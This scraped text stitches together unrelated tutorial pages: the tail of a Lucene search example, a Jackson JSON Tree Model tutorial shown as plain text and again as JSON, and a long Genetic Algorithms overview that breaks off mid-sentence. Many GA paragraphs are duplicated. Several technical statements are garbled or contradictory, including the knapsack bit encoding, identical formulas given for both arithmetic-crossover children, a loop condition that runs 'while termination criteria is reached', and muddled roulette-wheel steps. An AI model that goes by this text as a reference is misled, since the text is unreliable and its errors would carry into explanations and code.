}, { "code": null, "e": 8652, "s": 8191, "text": "Once you are done with the creation of the source, the raw data, the data directory, the index directory and the indexes, you can proceed by compiling and running your program. To do this, keep the LuceneTester.Java file tab active and use either the Run option available in the Eclipse IDE or use Ctrl + F11 to compile and run your LuceneTester application. If your application runs successfully, it will print the following message in Eclipse IDE's console −" }, { "code": null, "e": 9124, "s": 8652, "text": "10 documents found. Time :9ms\nScore: 1.0 File: E:\\Lucene\\Data\\record1.txt\nScore: 1.0 File: E:\\Lucene\\Data\\record10.txt\nScore: 1.0 File: E:\\Lucene\\Data\\record2.txt\nScore: 1.0 File: E:\\Lucene\\Data\\record3.txt\nScore: 1.0 File: E:\\Lucene\\Data\\record4.txt\nScore: 1.0 File: E:\\Lucene\\Data\\record5.txt\nScore: 1.0 File: E:\\Lucene\\Data\\record6.txt\nScore: 1.0 File: E:\\Lucene\\Data\\record7.txt\nScore: 1.0 File: E:\\Lucene\\Data\\record8.txt\nScore: 1.0 File: E:\\Lucene\\Data\\record9.txt\n" }, { "code": null, "e": 9131, "s": 9124, "text": " Print" }, { "code": null, "e": 9142, "s": 9131, "text": " Add Notes" } ]
Jackson - Tree Model
Tree Model prepares a in-memory tree representation of the JSON document. ObjectMapper build tree of JsonNode nodes. It is most flexible approach. It is analogus to DOM parser for XML. ObjectMapper provides a pointer to root node of the tree after reading the JSON. Root Node can be used to traverse the complete tree. Consider the following code snippet to get the root node of a provided JSON String. //Create an ObjectMapper instance ObjectMapper mapper = new ObjectMapper(); String jsonString = "{\"name\":\"Mahesh Kumar\", \"age\":21,\"verified\":false,\"marks\": [100,90,85]}"; //create tree from JSON JsonNode rootNode = mapper.readTree(jsonString); Get each node using relative path to the root node while traversing tree and process the data. Consider the following code snippet traversing the tree provided the root node. JsonNode nameNode = rootNode.path("name"); System.out.println("Name: "+ nameNode.textValue()); JsonNode marksNode = rootNode.path("marks"); Iterator<JsonNode> iterator = marksNode.elements(); Create a java class file named JacksonTester in C:\>Jackson_WORKSPACE. File: JacksonTester.java import java.io.IOException; import java.util.Iterator; import com.fasterxml.jackson.core.JsonParseException; import com.fasterxml.jackson.databind.JsonMappingException; import com.fasterxml.jackson.databind.JsonNode; import com.fasterxml.jackson.databind.ObjectMapper; public class JacksonTester { public static void main(String args[]){ try { ObjectMapper mapper = new ObjectMapper(); String jsonString = "{\"name\":\"Mahesh Kumar\", \"age\":21,\"verified\":false,\"marks\": [100,90,85]}"; JsonNode rootNode = mapper.readTree(jsonString); JsonNode nameNode = rootNode.path("name"); System.out.println("Name: "+ nameNode.textValue()); JsonNode ageNode = rootNode.path("age"); System.out.println("Age: " + ageNode.intValue()); JsonNode verifiedNode = rootNode.path("verified"); System.out.println("Verified: " + (verifiedNode.booleanValue() ? "Yes":"No")); JsonNode marksNode = rootNode.path("marks"); Iterator<JsonNode> iterator = marksNode.elements(); System.out.print("Marks: [ "); while (iterator.hasNext()) { JsonNode marks = iterator.next(); System.out.print(marks.intValue() + " "); } System.out.println("]"); } catch (JsonParseException e) { e.printStackTrace(); } catch (JsonMappingException e) { e.printStackTrace(); } catch (IOException e) { e.printStackTrace(); } } } Verify the result Compile the classes using javac compiler as follows: C:\Jackson_WORKSPACE>javac JacksonTester.java Now run the jacksonTester to see the result: C:\Jackson_WORKSPACE>java JacksonTester Verify the Output Name: Mahesh Kumar Age: 21 Verified: No Marks: [ 100 90 85 ] Tree to JSON Tree to Java Objects Print Add Notes Bookmark this page
[ { "code": null, "e": 1939, "s": 1753, "text": "Tree Model prepares a in-memory tree representation of the JSON document. ObjectMapper build tree of JsonNode nodes. It is most flexible approach. It is analogus to DOM parser for XML." }, { "code": null, "e": 2157, "s": 1939, "text": "ObjectMapper provides a pointer to root node of the tree after reading the JSON. Root Node can be used to traverse the complete tree. Consider the following code snippet to get the root node of a provided JSON String." }, { "code": null, "e": 2412, "s": 2157, "text": "//Create an ObjectMapper instance\nObjectMapper mapper = new ObjectMapper();\t\nString jsonString = \"{\\\"name\\\":\\\"Mahesh Kumar\\\", \\\"age\\\":21,\\\"verified\\\":false,\\\"marks\\\": [100,90,85]}\";\n//create tree from JSON\nJsonNode rootNode = mapper.readTree(jsonString);" }, { "code": null, "e": 2587, "s": 2412, "text": "Get each node using relative path to the root node while traversing tree and process the data. Consider the following code snippet traversing the tree provided the root node." }, { "code": null, "e": 2781, "s": 2587, "text": "JsonNode nameNode = rootNode.path(\"name\");\nSystem.out.println(\"Name: \"+ nameNode.textValue());\n \nJsonNode marksNode = rootNode.path(\"marks\");\nIterator<JsonNode> iterator = marksNode.elements();" }, { "code": null, "e": 2852, "s": 2781, "text": "Create a java class file named JacksonTester in C:\\>Jackson_WORKSPACE." }, { "code": null, "e": 2877, "s": 2852, "text": "File: JacksonTester.java" }, { "code": null, "e": 4362, "s": 2877, "text": "import java.io.IOException;\nimport java.util.Iterator;\n\nimport com.fasterxml.jackson.core.JsonParseException;\nimport com.fasterxml.jackson.databind.JsonMappingException;\nimport com.fasterxml.jackson.databind.JsonNode;\nimport com.fasterxml.jackson.databind.ObjectMapper;\n\npublic class JacksonTester {\n public static void main(String args[]){\n\n try {\n ObjectMapper mapper = new ObjectMapper();\n String jsonString = \"{\\\"name\\\":\\\"Mahesh Kumar\\\", \\\"age\\\":21,\\\"verified\\\":false,\\\"marks\\\": [100,90,85]}\";\n JsonNode rootNode = mapper.readTree(jsonString);\n\n JsonNode nameNode = rootNode.path(\"name\");\n System.out.println(\"Name: \"+ nameNode.textValue());\n\n JsonNode ageNode = rootNode.path(\"age\");\n System.out.println(\"Age: \" + ageNode.intValue());\n\n JsonNode verifiedNode = rootNode.path(\"verified\");\n System.out.println(\"Verified: \" + (verifiedNode.booleanValue() ? \"Yes\":\"No\"));\n\n JsonNode marksNode = rootNode.path(\"marks\");\n Iterator<JsonNode> iterator = marksNode.elements();\n System.out.print(\"Marks: [ \");\n\n while (iterator.hasNext()) {\n JsonNode marks = iterator.next();\n System.out.print(marks.intValue() + \" \"); \n }\n\n System.out.println(\"]\");\n }\n catch (JsonParseException e) { e.printStackTrace(); }\n catch (JsonMappingException e) { e.printStackTrace(); }\n catch (IOException e) { e.printStackTrace(); }\n }\n}" }, { "code": null, "e": 4380, "s": 4362, "text": "Verify the result" }, { "code": null, "e": 4433, "s": 4380, "text": "Compile the classes using javac compiler as follows:" }, { "code": null, "e": 4479, "s": 4433, "text": "C:\\Jackson_WORKSPACE>javac JacksonTester.java" }, { "code": null, "e": 4524, "s": 4479, "text": "Now run the jacksonTester to see the result:" }, { "code": null, "e": 4564, "s": 4524, "text": "C:\\Jackson_WORKSPACE>java JacksonTester" }, { "code": null, "e": 4582, "s": 4564, "text": "Verify the Output" }, { "code": null, "e": 4644, "s": 4582, "text": "Name: Mahesh Kumar\nAge: 21\nVerified: No\nMarks: [ 100 90 85 ]\n" }, { "code": null, "e": 4657, "s": 4644, "text": "Tree to JSON" }, { "code": null, "e": 4678, "s": 4657, "text": "Tree to Java Objects" }, { "code": null, "e": 4685, "s": 4678, "text": " Print" }, { "code": null, "e": 4696, "s": 4685, "text": " Add Notes" } ]
Genetic Algorithms - Quick Guide
Genetic Algorithm (GA) is a search-based optimization technique based on the principles of Genetics and Natural Selection. It is frequently used to find optimal or near-optimal solutions to difficult problems which otherwise would take a lifetime to solve. It is frequently used to solve optimization problems, in research, and in machine learning. Optimization is the process of making something better. In any process, we have a set of inputs and a set of outputs as shown in the following figure. Optimization refers to finding the values of inputs in such a way that we get the “best” output values. The definition of “best” varies from problem to problem, but in mathematical terms, it refers to maximizing or minimizing one or more objective functions, by varying the input parameters. The set of all possible solutions or values which the inputs can take make up the search space. In this search space, lies a point or a set of points which gives the optimal solution. The aim of optimization is to find that point or set of points in the search space. Nature has always been a great source of inspiration to all mankind. Genetic Algorithms (GAs) are search based algorithms based on the concepts of natural selection and genetics. GAs are a subset of a much larger branch of computation known as Evolutionary Computation. GAs were developed by John Holland and his students and colleagues at the University of Michigan, most notably David E. Goldberg and has since been tried on various optimization problems with a high degree of success. In GAs, we have a pool or a population of possible solutions to the given problem. These solutions then undergo recombination and mutation (like in natural genetics), producing new children, and the process is repeated over various generations. Each individual (or candidate solution) is assigned a fitness value (based on its objective function value) and the fitter individuals are given a higher chance to mate and yield more “fitter” individuals. This is in line with the Darwinian Theory of “Survival of the Fittest”. In this way we keep “evolving” better individuals or solutions over generations, till we reach a stopping criterion. Genetic Algorithms are sufficiently randomized in nature, but they perform much better than random local search (in which we just try various random solutions, keeping track of the best so far), as they exploit historical information as well. GAs have various advantages which have made them immensely popular. These include − Does not require any derivative information (which may not be available for many real-world problems). Does not require any derivative information (which may not be available for many real-world problems). Is faster and more efficient as compared to the traditional methods. Is faster and more efficient as compared to the traditional methods. Has very good parallel capabilities. Has very good parallel capabilities. Optimizes both continuous and discrete functions and also multi-objective problems. Optimizes both continuous and discrete functions and also multi-objective problems. Provides a list of “good” solutions and not just a single solution. Provides a list of “good” solutions and not just a single solution. Always gets an answer to the problem, which gets better over the time. Always gets an answer to the problem, which gets better over the time. Useful when the search space is very large and there are a large number of parameters involved. Useful when the search space is very large and there are a large number of parameters involved. Like any technique, GAs also suffer from a few limitations. These include − GAs are not suited for all problems, especially problems which are simple and for which derivative information is available. GAs are not suited for all problems, especially problems which are simple and for which derivative information is available. Fitness value is calculated repeatedly which might be computationally expensive for some problems. Fitness value is calculated repeatedly which might be computationally expensive for some problems. Being stochastic, there are no guarantees on the optimality or the quality of the solution. Being stochastic, there are no guarantees on the optimality or the quality of the solution. If not implemented properly, the GA may not converge to the optimal solution. If not implemented properly, the GA may not converge to the optimal solution. Genetic Algorithms have the ability to deliver a “good-enough” solution “fast-enough”. This makes genetic algorithms attractive for use in solving optimization problems. The reasons why GAs are needed are as follows − In computer science, there is a large set of problems, which are NP-Hard. What this essentially means is that, even the most powerful computing systems take a very long time (even years!) to solve that problem. In such a scenario, GAs prove to be an efficient tool to provide usable near-optimal solutions in a short amount of time. Traditional calculus based methods work by starting at a random point and by moving in the direction of the gradient, till we reach the top of the hill. This technique is efficient and works very well for single-peaked objective functions like the cost function in linear regression. But, in most real-world situations, we have a very complex problem called as landscapes, which are made of many peaks and many valleys, which causes such methods to fail, as they suffer from an inherent tendency of getting stuck at the local optima as shown in the following figure. Some difficult problems like the Travelling Salesperson Problem (TSP), have real-world applications like path finding and VLSI Design. Now imagine that you are using your GPS Navigation system, and it takes a few minutes (or even a few hours) to compute the “optimal” path from the source to destination. Delay in such real world applications is not acceptable and therefore a “good-enough” solution, which is delivered “fast” is what is required. This section introduces the basic terminology required to understand GAs. Also, a generic structure of GAs is presented in both pseudo-code and graphical forms. The reader is advised to properly understand all the concepts introduced in this section and keep them in mind when reading other sections of this tutorial as well. Before beginning a discussion on Genetic Algorithms, it is essential to be familiar with some basic terminology which will be used throughout this tutorial. Population − It is a subset of all the possible (encoded) solutions to the given problem. The population for a GA is analogous to the population for human beings except that instead of human beings, we have Candidate Solutions representing human beings. Population − It is a subset of all the possible (encoded) solutions to the given problem. The population for a GA is analogous to the population for human beings except that instead of human beings, we have Candidate Solutions representing human beings. Chromosomes − A chromosome is one such solution to the given problem. Chromosomes − A chromosome is one such solution to the given problem. Gene − A gene is one element position of a chromosome. Gene − A gene is one element position of a chromosome. Allele − It is the value a gene takes for a particular chromosome. Allele − It is the value a gene takes for a particular chromosome. Genotype − Genotype is the population in the computation space. In the computation space, the solutions are represented in a way which can be easily understood and manipulated using a computing system. Genotype − Genotype is the population in the computation space. In the computation space, the solutions are represented in a way which can be easily understood and manipulated using a computing system. Phenotype − Phenotype is the population in the actual real world solution space in which solutions are represented in a way they are represented in real world situations. Phenotype − Phenotype is the population in the actual real world solution space in which solutions are represented in a way they are represented in real world situations. Decoding and Encoding − For simple problems, the phenotype and genotype spaces are the same. However, in most of the cases, the phenotype and genotype spaces are different. Decoding is a process of transforming a solution from the genotype to the phenotype space, while encoding is a process of transforming from the phenotype to genotype space. Decoding should be fast as it is carried out repeatedly in a GA during the fitness value calculation. For example, consider the 0/1 Knapsack Problem. The Phenotype space consists of solutions which just contain the item numbers of the items to be picked. However, in the genotype space it can be represented as a binary string of length n (where n is the number of items). A 0 at position x represents that xth item is picked while a 1 represents the reverse. This is a case where genotype and phenotype spaces are different. Decoding and Encoding − For simple problems, the phenotype and genotype spaces are the same. However, in most of the cases, the phenotype and genotype spaces are different. Decoding is a process of transforming a solution from the genotype to the phenotype space, while encoding is a process of transforming from the phenotype to genotype space. Decoding should be fast as it is carried out repeatedly in a GA during the fitness value calculation. For example, consider the 0/1 Knapsack Problem. The Phenotype space consists of solutions which just contain the item numbers of the items to be picked. However, in the genotype space it can be represented as a binary string of length n (where n is the number of items). A 0 at position x represents that xth item is picked while a 1 represents the reverse. This is a case where genotype and phenotype spaces are different. Fitness Function − A fitness function simply defined is a function which takes the solution as input and produces the suitability of the solution as the output. In some cases, the fitness function and the objective function may be the same, while in others it might be different based on the problem. Fitness Function − A fitness function simply defined is a function which takes the solution as input and produces the suitability of the solution as the output. In some cases, the fitness function and the objective function may be the same, while in others it might be different based on the problem. Genetic Operators − These alter the genetic composition of the offspring. These include crossover, mutation, selection, etc. Genetic Operators − These alter the genetic composition of the offspring. These include crossover, mutation, selection, etc. The basic structure of a GA is as follows − We start with an initial population (which may be generated at random or seeded by other heuristics), select parents from this population for mating. Apply crossover and mutation operators on the parents to generate new off-springs. And finally these off-springs replace the existing individuals in the population and the process repeats. In this way genetic algorithms actually try to mimic the human evolution to some extent. Each of the following steps are covered as a separate chapter later in this tutorial. A generalized pseudo-code for a GA is explained in the following program − GA() initialize population find fitness of population while (termination criteria is reached) do parent selection crossover with probability pc mutation with probability pm decode and fitness calculation survivor selection find best return best One of the most important decisions to make while implementing a genetic algorithm is deciding the representation that we will use to represent our solutions. It has been observed that improper representation can lead to poor performance of the GA. Therefore, choosing a proper representation, having a proper definition of the mappings between the phenotype and genotype spaces is essential for the success of a GA. In this section, we present some of the most commonly used representations for genetic algorithms. However, representation is highly problem specific and the reader might find that another representation or a mix of the representations mentioned here might suit his/her problem better. This is one of the simplest and most widely used representation in GAs. In this type of representation the genotype consists of bit strings. For some problems when the solution space consists of Boolean decision variables – yes or no, the binary representation is natural. Take for example the 0/1 Knapsack Problem. If there are n items, we can represent a solution by a binary string of n elements, where the xth element tells whether the item x is picked (1) or not (0). For other problems, specifically those dealing with numbers, we can represent the numbers with their binary representation. The problem with this kind of encoding is that different bits have different significance and therefore mutation and crossover operators can have undesired consequences. This can be resolved to some extent by using Gray Coding, as a change in one bit does not have a massive effect on the solution. For problems where we want to define the genes using continuous rather than discrete variables, the real valued representation is the most natural. The precision of these real valued or floating point numbers is however limited to the computer. For discrete valued genes, we cannot always limit the solution space to binary ‘yes’ or ‘no’. For example, if we want to encode the four distances – North, South, East and West, we can encode them as {0,1,2,3}. In such cases, integer representation is desirable. In many problems, the solution is represented by an order of elements. In such cases permutation representation is the most suited. A classic example of this representation is the travelling salesman problem (TSP). In this the salesman has to take a tour of all the cities, visiting each city exactly once and come back to the starting city. The total distance of the tour has to be minimized. The solution to this TSP is naturally an ordering or permutation of all the cities and therefore using a permutation representation makes sense for this problem. Population is a subset of solutions in the current generation. It can also be defined as a set of chromosomes. There are several things to be kept in mind when dealing with GA population − The diversity of the population should be maintained otherwise it might lead to premature convergence. The diversity of the population should be maintained otherwise it might lead to premature convergence. The population size should not be kept very large as it can cause a GA to slow down, while a smaller population might not be enough for a good mating pool. Therefore, an optimal population size needs to be decided by trial and error. The population size should not be kept very large as it can cause a GA to slow down, while a smaller population might not be enough for a good mating pool. Therefore, an optimal population size needs to be decided by trial and error. The population is usually defined as a two dimensional array of – size population, size x, chromosome size. There are two primary methods to initialize a population in a GA. They are − Random Initialization − Populate the initial population with completely random solutions. Random Initialization − Populate the initial population with completely random solutions. Heuristic initialization − Populate the initial population using a known heuristic for the problem. Heuristic initialization − Populate the initial population using a known heuristic for the problem. It has been observed that the entire population should not be initialized using a heuristic, as it can result in the population having similar solutions and very little diversity. It has been experimentally observed that the random solutions are the ones to drive the population to optimality. Therefore, with heuristic initialization, we just seed the population with a couple of good solutions, filling up the rest with random solutions rather than filling the entire population with heuristic based solutions. It has also been observed that heuristic initialization in some cases, only effects the initial fitness of the population, but in the end, it is the diversity of the solutions which lead to optimality. There are two population models widely in use − In steady state GA, we generate one or two off-springs in each iteration and they replace one or two individuals from the population. A steady state GA is also known as Incremental GA. In a generational model, we generate ‘n’ off-springs, where n is the population size, and the entire population is replaced by the new one at the end of the iteration. The fitness function simply defined is a function which takes a candidate solution to the problem as input and produces as output how “fit” our how “good” the solution is with respect to the problem in consideration. Calculation of fitness value is done repeatedly in a GA and therefore it should be sufficiently fast. A slow computation of the fitness value can adversely affect a GA and make it exceptionally slow. In most cases the fitness function and the objective function are the same as the objective is to either maximize or minimize the given objective function. However, for more complex problems with multiple objectives and constraints, an Algorithm Designer might choose to have a different fitness function. A fitness function should possess the following characteristics − The fitness function should be sufficiently fast to compute. The fitness function should be sufficiently fast to compute. It must quantitatively measure how fit a given solution is or how fit individuals can be produced from the given solution. It must quantitatively measure how fit a given solution is or how fit individuals can be produced from the given solution. In some cases, calculating the fitness function directly might not be possible due to the inherent complexities of the problem at hand. In such cases, we do fitness approximation to suit our needs. The following image shows the fitness calculation for a solution of the 0/1 Knapsack. It is a simple fitness function which just sums the profit values of the items being picked (which have a 1), scanning the elements from left to right till the knapsack is full. Parent Selection is the process of selecting parents which mate and recombine to create off-springs for the next generation. Parent selection is very crucial to the convergence rate of the GA as good parents drive individuals to a better and fitter solutions. However, care should be taken to prevent one extremely fit solution from taking over the entire population in a few generations, as this leads to the solutions being close to one another in the solution space thereby leading to a loss of diversity. Maintaining good diversity in the population is extremely crucial for the success of a GA. This taking up of the entire population by one extremely fit solution is known as premature convergence and is an undesirable condition in a GA. Fitness Proportionate Selection is one of the most popular ways of parent selection. In this every individual can become a parent with a probability which is proportional to its fitness. Therefore, fitter individuals have a higher chance of mating and propagating their features to the next generation. Therefore, such a selection strategy applies a selection pressure to the more fit individuals in the population, evolving better individuals over time. Consider a circular wheel. The wheel is divided into n pies, where n is the number of individuals in the population. Each individual gets a portion of the circle which is proportional to its fitness value. Two implementations of fitness proportionate selection are possible − In a roulette wheel selection, the circular wheel is divided as described before. A fixed point is chosen on the wheel circumference as shown and the wheel is rotated. The region of the wheel which comes in front of the fixed point is chosen as the parent. For the second parent, the same process is repeated. It is clear that a fitter individual has a greater pie on the wheel and therefore a greater chance of landing in front of the fixed point when the wheel is rotated. Therefore, the probability of choosing an individual depends directly on its fitness. Implementation wise, we use the following steps − Calculate S = the sum of a finesses. Calculate S = the sum of a finesses. Generate a random number between 0 and S. Generate a random number between 0 and S. Starting from the top of the population, keep adding the finesses to the partial sum P, till P<S. Starting from the top of the population, keep adding the finesses to the partial sum P, till P<S. The individual for which P exceeds S is the chosen individual. The individual for which P exceeds S is the chosen individual. Stochastic Universal Sampling is quite similar to Roulette wheel selection, however instead of having just one fixed point, we have multiple fixed points as shown in the following image. Therefore, all the parents are chosen in just one spin of the wheel. Also, such a setup encourages the highly fit individuals to be chosen at least once. It is to be noted that fitness proportionate selection methods don’t work for cases where the fitness can take a negative value. In K-Way tournament selection, we select K individuals from the population at random and select the best out of these to become a parent. The same process is repeated for selecting the next parent. Tournament Selection is also extremely popular in literature as it can even work with negative fitness values. Rank Selection also works with negative fitness values and is mostly used when the individuals in the population have very close fitness values (this happens usually at the end of the run). This leads to each individual having an almost equal share of the pie (like in case of fitness proportionate selection) as shown in the following image and hence each individual no matter how fit relative to each other has an approximately same probability of getting selected as a parent. This in turn leads to a loss in the selection pressure towards fitter individuals, making the GA to make poor parent selections in such situations. In this, we remove the concept of a fitness value while selecting a parent. However, every individual in the population is ranked according to their fitness. The selection of the parents depends on the rank of each individual and not the fitness. The higher ranked individuals are preferred more than the lower ranked ones. In this strategy we randomly select parents from the existing population. There is no selection pressure towards fitter individuals and therefore this strategy is usually avoided. In this chapter, we will discuss about what a Crossover Operator is along with its other modules, their uses and benefits. The crossover operator is analogous to reproduction and biological crossover. In this more than one parent is selected and one or more off-springs are produced using the genetic material of the parents. Crossover is usually applied in a GA with a high probability – pc . In this section we will discuss some of the most popularly used crossover operators. It is to be noted that these crossover operators are very generic and the GA Designer might choose to implement a problem-specific crossover operator as well. In this one-point crossover, a random crossover point is selected and the tails of its two parents are swapped to get new off-springs. Multi point crossover is a generalization of the one-point crossover wherein alternating segments are swapped to get new off-springs. In a uniform crossover, we don’t divide the chromosome into segments, rather we treat each gene separately. In this, we essentially flip a coin for each chromosome to decide whether or not it’ll be included in the off-spring. We can also bias the coin to one parent, to have more genetic material in the child from that parent. This is commonly used for integer representations and works by taking the weighted average of the two parents by using the following formulae − Child1 = α.x + (1-α).y Child2 = α.x + (1-α).y Obviously, if α = 0.5, then both the children will be identical as shown in the following image. OX1 is used for permutation based crossovers with the intention of transmitting information about relative ordering to the off-springs. It works as follows − Create two random crossover points in the parent and copy the segment between them from the first parent to the first offspring. Create two random crossover points in the parent and copy the segment between them from the first parent to the first offspring. Now, starting from the second crossover point in the second parent, copy the remaining unused numbers from the second parent to the first child, wrapping around the list. Now, starting from the second crossover point in the second parent, copy the remaining unused numbers from the second parent to the first child, wrapping around the list. Repeat for the second child with the parent’s role reversed. Repeat for the second child with the parent’s role reversed. There exist a lot of other crossovers like Partially Mapped Crossover (PMX), Order based crossover (OX2), Shuffle Crossover, Ring Crossover, etc. In simple terms, mutation may be defined as a small random tweak in the chromosome, to get a new solution. It is used to maintain and introduce diversity in the genetic population and is usually applied with a low probability – pm. If the probability is very high, the GA gets reduced to a random search. Mutation is the part of the GA which is related to the “exploration” of the search space. It has been observed that mutation is essential to the convergence of the GA while crossover is not. In this section, we describe some of the most commonly used mutation operators. Like the crossover operators, this is not an exhaustive list and the GA designer might find a combination of these approaches or a problem-specific mutation operator more useful. In this bit flip mutation, we select one or more random bits and flip them. This is used for binary encoded GAs. Random Resetting is an extension of the bit flip for the integer representation. In this, a random value from the set of permissible values is assigned to a randomly chosen gene. In swap mutation, we select two positions on the chromosome at random, and interchange the values. This is common in permutation based encodings. Scramble mutation is also popular with permutation representations. In this, from the entire chromosome, a subset of genes is chosen and their values are scrambled or shuffled randomly. In inversion mutation, we select a subset of genes like in scramble mutation, but instead of shuffling the subset, we merely invert the entire string in the subset. The Survivor Selection Policy determines which individuals are to be kicked out and which are to be kept in the next generation. It is crucial as it should ensure that the fitter individuals are not kicked out of the population, while at the same time diversity should be maintained in the population. Some GAs employ Elitism. In simple terms, it means the current fittest member of the population is always propagated to the next generation. Therefore, under no circumstance can the fittest member of the current population be replaced. The easiest policy is to kick random members out of the population, but such an approach frequently has convergence issues, therefore the following strategies are widely used. In Age-Based Selection, we don’t have a notion of a fitness. It is based on the premise that each individual is allowed in the population for a finite generation where it is allowed to reproduce, after that, it is kicked out of the population no matter how good its fitness is. For instance, in the following example, the age is the number of generations for which the individual has been in the population. The oldest members of the population i.e. P4 and P7 are kicked out of the population and the ages of the rest of the members are incremented by one. In this fitness based selection, the children tend to replace the least fit individuals in the population. The selection of the least fit individuals may be done using a variation of any of the selection policies described before – tournament selection, fitness proportionate selection, etc. For example, in the following image, the children replace the least fit individuals P1 and P10 of the population. It is to be noted that since P1 and P9 have the same fitness value, the decision to remove which individual from the population is arbitrary. The termination condition of a Genetic Algorithm is important in determining when a GA run will end. It has been observed that initially, the GA progresses very fast with better solutions coming in every few iterations, but this tends to saturate in the later stages where the improvements are very small. We usually want a termination condition such that our solution is close to the optimal, at the end of the run. Usually, we keep one of the following termination conditions − When there has been no improvement in the population for X iterations. When we reach an absolute number of generations. When the objective function value has reached a certain pre-defined value. For example, in a genetic algorithm we keep a counter which keeps track of the generations for which there has been no improvement in the population. Initially, we set this counter to zero. Each time we don’t generate off-springs which are better than the individuals in the population, we increment the counter. However, if the fitness any of the off-springs is better, then we reset the counter to zero. The algorithm terminates when the counter reaches a predetermined value. Like other parameters of a GA, the termination condition is also highly problem specific and the GA designer should try out various options to see what suits his particular problem the best. Till now in this tutorial, whatever we have discussed corresponds to the Darwinian model of evolution – natural selection and genetic variation through recombination and mutation. In nature, only the information contained in the individual’s genotype can be transmitted to the next generation. This is the approach which we have been following in the tutorial so far. However, other models of lifetime adaptation – Lamarckian Model and Baldwinian Model also do exist. It is to be noted that whichever model is the best, is open for debate and the results obtained by researchers show that the choice of lifetime adaptation is highly problem specific. Often, we hybridize a GA with local search – like in Memetic Algorithms. In such cases, one might choose do go with either Lamarckian or Baldwinian Model to decide what to do with individuals generated after the local search. The Lamarckian Model essentially says that the traits which an individual acquires in his/her lifetime can be passed on to its offspring. It is named after French biologist Jean-Baptiste Lamarck. Even though, natural biology has completely disregarded Lamarckism as we all know that only the information in the genotype can be transmitted. However, from a computation view point, it has been shown that adopting the Lamarckian model gives good results for some of the problems. In the Lamarckian model, a local search operator examines the neighborhood (acquiring new traits), and if a better chromosome is found, it becomes the offspring. The Baldwinian model is an intermediate idea named after James Mark Baldwin (1896). In the Baldwin model, the chromosomes can encode a tendency of learning beneficial behaviors. This means, that unlike the Lamarckian model, we don’t transmit the acquired traits to the next generation, and neither do we completely ignore the acquired traits like in the Darwinian Model. The Baldwin Model is in the middle of these two extremes, wherein the tendency of an individual to acquire certain traits is encoded rather than the traits themselves. In this Baldwinian Model, a local search operator examines the neighborhood (acquiring new traits), and if a better chromosome is found, it only assigns the improved fitness to the chromosome and does not modify the chromosome itself. The change in fitness signifies the chromosomes capability to “acquire the trait”, even though it is not passed directly to the future generations. GAs are very general in nature, and just applying them to any optimization problem wouldn’t give good results. In this section, we describe a few points which would help and assist a GA designer or GA implementer in their work. It has been observed that the more problem-specific domain knowledge we incorporate into the GA; the better objective values we get. Adding problem specific information can be done by either using problem specific crossover or mutation operators, custom representations, etc. The following image shows Michalewicz’s (1990) view of the EA − Crowding happens when a highly fit chromosome gets to reproduce a lot, and in a few generations, the entire population is filled with similar solutions having similar fitness. This reduces diversity which is a very crucial element to ensure the success of a GA. There are numerous ways to limit crowding. Some of them are − Mutation to introduce diversity. Mutation to introduce diversity. Switching to rank selection and tournament selection which have more selection pressure than fitness proportionate selection for individuals with similar fitness. Switching to rank selection and tournament selection which have more selection pressure than fitness proportionate selection for individuals with similar fitness. Fitness Sharing − In this an individual’s fitness is reduced if the population already contains similar individuals. Fitness Sharing − In this an individual’s fitness is reduced if the population already contains similar individuals. It has been experimentally observed that the best solutions are driven by randomized chromosomes as they impart diversity to the population. The GA implementer should be careful to keep sufficient amount of randomization and diversity in the population for the best results. Local search refers to checking the solutions in the neighborhood of a given solution to look for better objective values. It may be sometimes useful to hybridize the GA with local search. The following image shows the various places in which local search can be introduced in a GA. In genetic algorithms, there is no “one size fits all” or a magic formula which works for all problems. Even after the initial GA is ready, it takes a lot of time and effort to play around with the parameters like population size, mutation and crossover probability etc. to find the ones which suit the particular problem. In this section, we introduce some advanced topics in Genetic Algorithms. A reader looking for just an introduction to GAs may choose to skip this section. Constrained Optimization Problems are those optimization problems in which we have to maximize or minimize a given objective function value that is subject to certain constraints. Therefore, not all results in the solution space are feasible, and the solution space contains feasible regions as shown in the following image. In such a scenario, crossover and mutation operators might give us solutions which are infeasible. Therefore, additional mechanisms have to be employed in the GA when dealing with constrained Optimization Problems. Some of the most common methods are − Using penalty functions which reduces the fitness of infeasible solutions, preferably so that the fitness is reduced in proportion with the number of constraints violated or the distance from the feasible region. Using penalty functions which reduces the fitness of infeasible solutions, preferably so that the fitness is reduced in proportion with the number of constraints violated or the distance from the feasible region. Using repair functions which take an infeasible solution and modify it so that the violated constraints get satisfied. Using repair functions which take an infeasible solution and modify it so that the violated constraints get satisfied. Not allowing infeasible solutions to enter into the population at all. Not allowing infeasible solutions to enter into the population at all. Use a special representation or decoder functions that ensures feasibility of the solutions. Use a special representation or decoder functions that ensures feasibility of the solutions. In this section, we will discuss about the Schema and NFL theorem along with the building block hypothesis. Researchers have been trying to figure out the mathematics behind the working of genetic algorithms, and Holland’s Schema Theorem is a step in that direction. Over the year’s various improvements and suggestions have been done to the Schema Theorem to make it more general. In this section, we don’t delve into the mathematics of the Schema Theorem, rather we try to develop a basic understanding of what the Schema Theorem is. The basic terminology to know are as follows − A Schema is a “template”. Formally, it is a string over the alphabet = {0,1,*}, where * is don’t care and can take any value. Therefore, *10*1 could mean 01001, 01011, 11001, or 11011 Geometrically, a schema is a hyper-plane in the solution search space. A Schema is a “template”. Formally, it is a string over the alphabet = {0,1,*}, where * is don’t care and can take any value. Therefore, *10*1 could mean 01001, 01011, 11001, or 11011 Geometrically, a schema is a hyper-plane in the solution search space. Order of a schema is the number of specified fixed positions in a gene. Order of a schema is the number of specified fixed positions in a gene. Defining length is the distance between the two furthest fixed symbols in the gene. Defining length is the distance between the two furthest fixed symbols in the gene. The schema theorem states that this schema with above average fitness, short defining length and lower order is more likely to survive crossover and mutation. Building Blocks are low order, low defining length schemata with the above given average fitness. The building block hypothesis says that such building blocks serve as a foundation for the GAs success and adaptation in GAs as it progresses by successively identifying and recombining such “building blocks”. Wolpert and Macready in 1997 published a paper titled "No Free Lunch Theorems for Optimization." It essentially states that if we average over the space of all possible problems, then all non-revisiting black box algorithms will exhibit the same performance. It means that the more we understand a problem, our GA becomes more problem specific and gives better performance, but it makes up for that by performing poorly for other problems. Genetic Algorithms also find application in Machine Learning. Classifier systems are a form of genetics-based machine learning (GBML) system that are frequently used in the field of machine learning. GBML methods are a niche approach to machine learning. There are two categories of GBML systems − The Pittsburg Approach − In this approach, one chromosome encoded one solution, and so fitness is assigned to solutions. The Pittsburg Approach − In this approach, one chromosome encoded one solution, and so fitness is assigned to solutions. The Michigan Approach − one solution is typically represented by many chromosomes and so fitness is 